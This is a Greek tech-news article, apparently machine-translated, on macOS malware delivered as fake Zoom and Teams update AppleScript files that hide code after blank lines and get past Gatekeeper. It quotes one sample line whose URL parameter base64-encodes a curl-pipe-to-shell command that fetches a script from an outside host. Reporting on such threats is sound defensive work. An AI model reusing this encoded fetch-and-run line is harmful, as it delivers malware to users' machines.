Close Menu
TechReport.grTechReport.gr
  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology

Subscribe to Updates

Get the latest creative news from FooBar about art, design and business.

What's Hot
Το Huawei Mate 80 GTS φημολογείται ότι θα κυκλοφορήσει το πρώτο εξάμηνο του 2026

Το Huawei Mate 80 GTS φημολογείται ότι θα κυκλοφορήσει το πρώτο εξάμηνο του 2026

27 Δεκεμβρίου 2025
Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα

Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα

27 Δεκεμβρίου 2025
Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!

Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!

27 Δεκεμβρίου 2025
Facebook X (Twitter) Instagram
  • Home
  • Πολιτική απορρήτου
  • Σχετικά με εμάς
  • Contact With TechReport
  • Greek Live Channels IPTV 2025
Facebook X (Twitter) Instagram Pinterest Vimeo
TechReport.grTechReport.gr
  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
TechReport.grTechReport.gr
Αρχική » Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams
Security

Οι χάκερ οπλίζουν το AppleScript για να παραδώσουν δημιουργικά κακόβουλο λογισμικό macOS Mimic ως ενημερώσεις Zoom/Teams

Marizas DimitrisBy Marizas Dimitris12 Νοεμβρίου 2025Δεν υπάρχουν Σχόλια3 Mins Read
Share Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram Email
Share
Facebook Twitter LinkedIn Pinterest Tumblr Telegram WhatsApp Email


Οι φορείς απειλών συνεχίζουν να εξελίσσουν τις τεχνικές τους για την παράκαμψη των ελέγχων ασφαλείας του macOS, απομακρυνόμενοι από τους παραδοσιακούς φορείς επίθεσης που η Apple έχει επιδιορθώσει συστηματικά.

Μετά την κατάργηση από την Apple της παράκαμψης “δεξί κλικ και ανοίξτε” Gatekeeper τον Αύγουστο του 2024, οι επιτιθέμενοι εντόπισαν και όπλισαν έναν νέο μηχανισμό παράδοσης χρησιμοποιώντας μεταγλωττισμένα αρχεία AppleScript με παραπλανητικές συμβάσεις ονομασίας.

Αυτά τα αρχεία.

Η αναδυόμενη απειλή επικεντρώνεται σε αρχεία .scpt που ανοίγουν απευθείας στο Script Editor.app από προεπιλογή, δημιουργώντας μια ελκυστική επιφάνεια επίθεσης για τους παράγοντες απειλών.

Όταν οι χρήστες κάνουν διπλό κλικ σε αυτά τα αρχεία, η εφαρμογή εμφανίζει μια φιλική προς το χρήστη διεπαφή με ζητήματα κοινωνικής μηχανικής που ενθαρρύνουν την εκτέλεση.

Οι χειριστές κακόβουλου λογισμικού ενσωματώνουν στρατηγικά κακόβουλο κώδικα μετά από εκτεταμένες κενές γραμμές για να κρύψουν το πραγματικό ωφέλιμο φορτίο από την περιστασιακή επιθεώρηση.

Κάνοντας απλώς κλικ στο κουμπί “Εκτέλεση” ή πατώντας Cmd+R, οι χρήστες εκτελούν ακούσια το σενάριο, ακόμη κι αν έχει επισημανθεί από τα προστατευτικά καραντίνας του Gatekeeper, παρακάμπτοντας ουσιαστικά τους μηχανισμούς ασφαλείας της Apple.

Παράδειγμα ψεύτικης ενημέρωσης Chrome (Πηγή - Pepe Berba)
Παράδειγμα ψεύτικης ενημέρωσης Chrome (Πηγή – Pepe Berba)

Αναλυτές ασφαλείας στα Moonlock Labs και Pepe Berba αναγνωρισθείς Αυτή η τεχνική κερδίζει εξέχουσα θέση τους τελευταίους μήνες, ανακαλύπτοντας εξελιγμένες εκστρατείες που εμφανίζονταν στο παρελθόν σε προηγμένες επιχειρήσεις επίμονης απειλής.

Ο Pepe Berba σημείωσε ότι ενώ τα ίδια τα αρχεία AppleScript δεν είναι καινούργια, ο πολλαπλασιασμός των δειγμάτων που χρησιμοποιούν αυτήν την τεχνική αντιπροσωπεύει μια ανησυχητική τάση, ιδιαίτερα καθώς οι οικογένειες κακόβουλου λογισμικού εμπορευμάτων όπως το MacSync Stealer και το Odyssey Stealer έχουν υιοθετήσει τη μεθοδολογία.

Αυτό αντιπροσωπεύει μια κλασική περίπτωση προηγμένων τεχνικών που κυλούν από φορείς που χρηματοδοτούνται από το κράτος σε κοινές επιχειρήσεις εγκληματικότητας στον κυβερνοχώρο.

Τεχνική δομή

Η τεχνική δομή αυτών των σεναρίων χρησιμοποιεί αρκετές έξυπνες τακτικές εξαπάτησης.

Ένα δείγμα που αναλύθηκε αποκαλύπτει κώδικα AppleScript όπως π.χ set teamsSDKURL to "https://learn.microsoft.com/en-us/microsoftteams/platform/?v=Y3VybCAtc0wgYXVici5pby94LnNoIHwgc2ggLXY=" ακολουθούμενη από do shell script "open -g " & quoted form of teamsSDKURL.

Ροή εκτέλεσης (Πηγή - Pepe Berba)
Ροή εκτέλεσης (Πηγή – Pepe Berba)

Αυτή η δομή εντολών ανοίγει κακόβουλες διευθύνσεις URL στο παρασκήνιο, ενώ παρουσιάζει στον χρήστη προτροπές ενημέρωσης με νόμιμη εμφάνιση.

Τα ίδια τα ονόματα αρχείων χρησιμεύουν ως το κύριο επίπεδο παραπλάνησης, με παραλλαγές που περιλαμβάνουν τα “MSTeamsUpdate.scpt”, “Zoom SDK Update.scpt” και “Microsoft.TeamsSDK.scpt”.

Η εμμονή και οι δυνατότητες αποφυγής εντοπισμού αυτών των επιθέσεων αξίζουν ιδιαίτερης προσοχής.

Πολλά αρχεία .scpt διατηρούν επί του παρόντος μηδενικές ανιχνεύσεις στο VirusTotal, παρέχοντας στους εισβολείς σημαντικό λειτουργικό διάδρομο προτού οι προμηθευτές ασφαλείας εφαρμόσουν υπογραφές ανίχνευσης.

Τα αρχεία φτάνουν συχνά μέσω email ηλεκτρονικού ψαρέματος ή παραβιασμένους ιστότοπους που προσφέρουν ενημερώσεις λογισμικού, στοχεύοντας χρήστες που αναζητούν νόμιμες αναβαθμίσεις εκδόσεων.

Αυτός ο φορέας επίθεσης παρουσιάζει μια σημαντική πρόκληση για την ασφάλεια του macOS, καθώς εκμεταλλεύεται την εμπιστοσύνη των χρηστών σε γνωστά ονόματα εφαρμογών, ενώ αξιοποιεί εγγενή εργαλεία συστήματος με τα οποία αλληλεπιδρούν τακτικά οι νόμιμοι χρήστες.

Οι οργανισμοί πρέπει να εκπαιδεύουν τους χρήστες σχετικά με την επαλήθευση ενημερώσεων λογισμικού μέσω επίσημων καναλιών και να εφαρμόζουν λύσεις ανίχνευσης τελικών σημείων ικανών να παρακολουθούν μοτίβα εκτέλεσης AppleScript.



VIA: cybersecuritynews.com

Related Posts


Το εξαιρετικά εξελιγμένο macOS DigitStealer χρησιμοποιεί επιθέσεις πολλαπλών σταδίων για να αποφύγει τον εντοπισμό
Security

Τι μας δίδαξε το 2025 για το σύγχρονο κακόβουλο λογισμικό
Security

Νέο κακόβουλο λογισμικό MacSync Stealer που επιτίθεται σε χρήστες macOS χρησιμοποιώντας εφαρμογές με ψηφιακή υπογραφή
Security
app apple macOS update ασφάλεια στον κυβερνοχώρο νέα για την ασφάλεια στον κυβερνοχώρο
Share. Facebook Twitter Pinterest LinkedIn Tumblr Reddit Telegram WhatsApp Email
Previous ArticleΜελέτη της Οξφόρδης βρίσκει ότι τα σημεία αναφοράς AI συχνά υπερβάλλουν την απόδοση του μοντέλου
Next Article Παύλος Γερουλάνος: Το ΠΑΣΟΚ ως παράδειγμα διακυβέρνησης – Τυπολογίες
Marizas Dimitris
  • Website
  • Facebook

Ο Δημήτρης είναι παθιασμένος με την τεχνολογία και τις καινοτομίες. Λατρεύει να εξερευνά νέες ιδέες, να επιλύει σύνθετα προβλήματα και να βρίσκει τρόπους ώστε η τεχνολογία να γίνεται πιο ανθρώπινη, απολαυστική και προσιτή για όλους. Στον ελεύθερο χρόνο του ασχολείται με το σκάκι και το poker, απολαμβάνοντας την στρατηγική και τη δημιουργική σκέψη που απαιτούν.

Related Posts

Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα
Security

Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα

27 Δεκεμβρίου 2025
Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!
Android

Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!

27 Δεκεμβρίου 2025
Android

«Ανακαλύψτε το Τηλέφωνο-Επαναστάτη του 2025: Το Αναδιπλούμενο Μυστικό που Πρέπει να Γνωρίζετε!»

27 Δεκεμβρίου 2025
Add A Comment
Leave A Reply Cancel Reply

Top Posts

Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

13 Νοεμβρίου 20251.156 Views

Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

30 Οκτωβρίου 2025570 Views
Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

12 Νοεμβρίου 2025468 Views
Stay In Touch
  • Facebook
  • YouTube
  • TikTok
  • WhatsApp
  • Twitter
  • Instagram
Latest News
Το Huawei Mate 80 GTS φημολογείται ότι θα κυκλοφορήσει το πρώτο εξάμηνο του 2026 Huawei News

Το Huawei Mate 80 GTS φημολογείται ότι θα κυκλοφορήσει το πρώτο εξάμηνο του 2026

Marizas Dimitris27 Δεκεμβρίου 2025
Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα Security

Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα

Marizas Dimitris27 Δεκεμβρίου 2025
Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ! Android

Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!

Marizas Dimitris27 Δεκεμβρίου 2025
Most Popular

Οδηγός για το Πρόγραμμα «Ψηφιακές Συναλλαγές Β’» (2025) – Όσα πρέπει να γνωρίζουμε

13 Νοεμβρίου 20251.156 Views

Ο διαλογισμός έχει επικίνδυνες παρενέργειες. Τι λένε οι επιστήμονες;

30 Οκτωβρίου 2025570 Views
Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα οδηγός

Αλλάζω Σύστημα Θέρμανσης και Θερμοσίφωνα: Πλήρης Οδηγός για 100.000 Νέους Δικαιούχους

12 Νοεμβρίου 2025468 Views
About TechReport.gr

Το TechReport.gr ιδρύθηκε με στόχο να αποτελέσει την πρώτη πηγή ενημέρωσης για όσους αναζητούν αξιόπιστη και εμπεριστατωμένη κάλυψη του τεχνολογικού κόσμου. Από την αρχή της λειτουργίας του, το site έχει δεσμευτεί στην παροχή ποιοτικού περιεχομένου που συνδυάζει ενημέρωση, ανάλυση και πρακτικές συμβουλές.
• Email: [email protected]
• Phone: +30 6980 730 713
Copyright © 2025| TechReport.gr | A project by: Δημήτρης Μάριζας
Λογότυπα, επωνυμίες, εμπορικά σήματα και γνωρίσματα ανήκουν στους νόμιμους ιδιοκτήτες.

Our Picks
Το Huawei Mate 80 GTS φημολογείται ότι θα κυκλοφορήσει το πρώτο εξάμηνο του 2026

Το Huawei Mate 80 GTS φημολογείται ότι θα κυκλοφορήσει το πρώτο εξάμηνο του 2026

27 Δεκεμβρίου 2025
Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα

Τα τρωτά σημεία του TeamViewer DEX επιτρέπουν στους εισβολείς να ενεργοποιήσουν επίθεση DoS και να εκθέσουν ευαίσθητα δεδομένα

27 Δεκεμβρίου 2025
Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!

Αγοράσατε νέα μπάρα ήχου Sonos; Ανακαλύψτε τις 5 Ρυθμίσεις που ΘΑ ΑΛΛΑΞΟΥΝ ΤΗΝ ΗΧΟΓΕΝΕΙΑ ΣΑΣ!

27 Δεκεμβρίου 2025
Facebook X (Twitter) Instagram Pinterest
  • Phones
    • iPhone – iOS
    • Android
    • Samsung
  • Computer
  • Internet
    • Security
  • Entertainment
    • Gaming
  • Business
  • Economics
    • Cryptos
  • Gadgets
  • Technology
    • Science
    • Reviews
    • How-To
  • Health
    • Psychology
© 2025 TechReport.gr Designed and Developed by Dimitris Marizas.

Type above and press Enter to search. Press Esc to cancel.

Ad Blocker Enabled!
Ad Blocker Enabled!
Our website is made possible by displaying online advertisements to our visitors. Please support us by disabling your Ad Blocker.